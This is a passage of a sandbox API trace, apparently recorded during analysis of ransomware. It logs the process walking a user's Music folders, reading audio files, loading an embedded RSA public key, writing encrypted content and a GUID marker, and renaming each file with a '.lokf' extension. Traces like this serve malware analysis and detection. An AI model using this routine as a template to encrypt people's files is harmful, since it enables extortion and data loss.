halpmcxz\\music\\eiv9rdb\\w_gaxxrjb.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\w_gaxxrjB.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\w_gaxxrjb.wav.lokf")) returned 1 [0059.884] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e175e0, ftCreationTime.dwHighDateTime=0x1d4cfac, ftLastAccessTime.dwLowDateTime=0x3b5e9560, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x3b5e9560, ftLastWriteTime.dwHighDateTime=0x1d4d47a, nFileSizeHigh=0x0, nFileSizeLow=0xdf81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_o S4wHhVVehFDOD.m4a", cAlternateFileName="_OS4WH~1.M4A")) returned 1 [0059.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.884] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adbb0 [0059.884] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\_o S4wHhVVehFDOD.m4a") returned=".m4a" [0059.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\_o S4wHhVVehFDOD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\_o s4whhvvehfdod.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.884] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=57217) returned 1 [0059.884] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.887] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdf5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.887] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.887] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.887] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xdf81, lpOverlapped=0x0) returned 1 [0059.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.888] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.888] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.889] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.889] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.889] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.889] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.889] GetLastError () returned 0x0 [0059.889] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.889] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.889] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.889] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.889] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xdf80) returned 0x9c88ae8 [0059.889] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.889] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88688 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85998 [0059.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c886d0 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859b0 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859e0 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859f8 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.890] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859e0 | out: hHeap=0x660000) returned 1 [0059.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859f8 | out: hHeap=0x660000) returned 1 [0059.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.890] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c859f8 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c859e0 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.891] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdf81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.891] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.891] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.891] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.891] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.891] CloseHandle (hObject=0x5cc) returned 1 [0059.892] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\_o S4wHhVVehFDOD.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\_o s4whhvvehfdod.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\_o S4wHhVVehFDOD.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\_o s4whhvvehfdod.m4a.lokf")) returned 1 [0059.892] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.892] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.892] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.894] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0059.894] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e175e0, ftCreationTime.dwHighDateTime=0x1d4cfac, ftLastAccessTime.dwLowDateTime=0x3b5e9560, ftLastAccessTime.dwHighDateTime=0x1d4d47a, ftLastWriteTime.dwLowDateTime=0x3b5e9560, ftLastWriteTime.dwHighDateTime=0x1d4d47a, nFileSizeHigh=0x0, nFileSizeLow=0xdf81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_o S4wHhVVehFDOD.m4a", cAlternateFileName="_OS4WH~1.M4A")) returned 0 [0059.894] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.894] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.894] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.894] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.894] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.894] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0059.894] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0059.894] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.894] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.894] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.894] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.894] PathFindFileNameW (pszPath="") returned="" [0059.894] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x8b298c90, ftLastAccessTime.dwHighDateTime=0x1d4d546, ftLastWriteTime.dwLowDateTime=0x8b298c90, ftLastWriteTime.dwHighDateTime=0x1d4d546, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.895] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0059.895] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x8b298c90, ftLastAccessTime.dwHighDateTime=0x1d4d546, ftLastWriteTime.dwLowDateTime=0x8b298c90, ftLastWriteTime.dwHighDateTime=0x1d4d546, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.895] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd23ae240, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x3de8b5f0, ftLastAccessTime.dwHighDateTime=0x1d4cf88, ftLastWriteTime.dwLowDateTime=0x3de8b5f0, ftLastWriteTime.dwHighDateTime=0x1d4cf88, nFileSizeHigh=0x0, nFileSizeLow=0x12f04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2frIwLIsuulHRSHkT.wav", cAlternateFileName="2FRIWL~1.WAV")) returned 1 [0059.895] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2frIwLIsuulHRSHkT.wav") returned=".wav" [0059.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2frIwLIsuulHRSHkT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\2friwlisuulhrshkt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.895] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=77572) returned 1 [0059.895] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.897] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.897] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.898] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12f04, lpOverlapped=0x0) returned 1 [0059.898] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.899] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.899] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.899] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.899] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.899] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.899] GetLastError () returned 0x0 [0059.900] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.900] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.900] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.900] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.900] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.900] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.900] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12f00) returned 0x9c88ae8 [0059.900] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.900] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c886d0 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859b0 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88718 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859c8 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c859f8 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85a10 [0059.900] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.901] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859f8 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a10 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85a10 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c859f8 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.901] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85a10 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c859f8 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.901] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 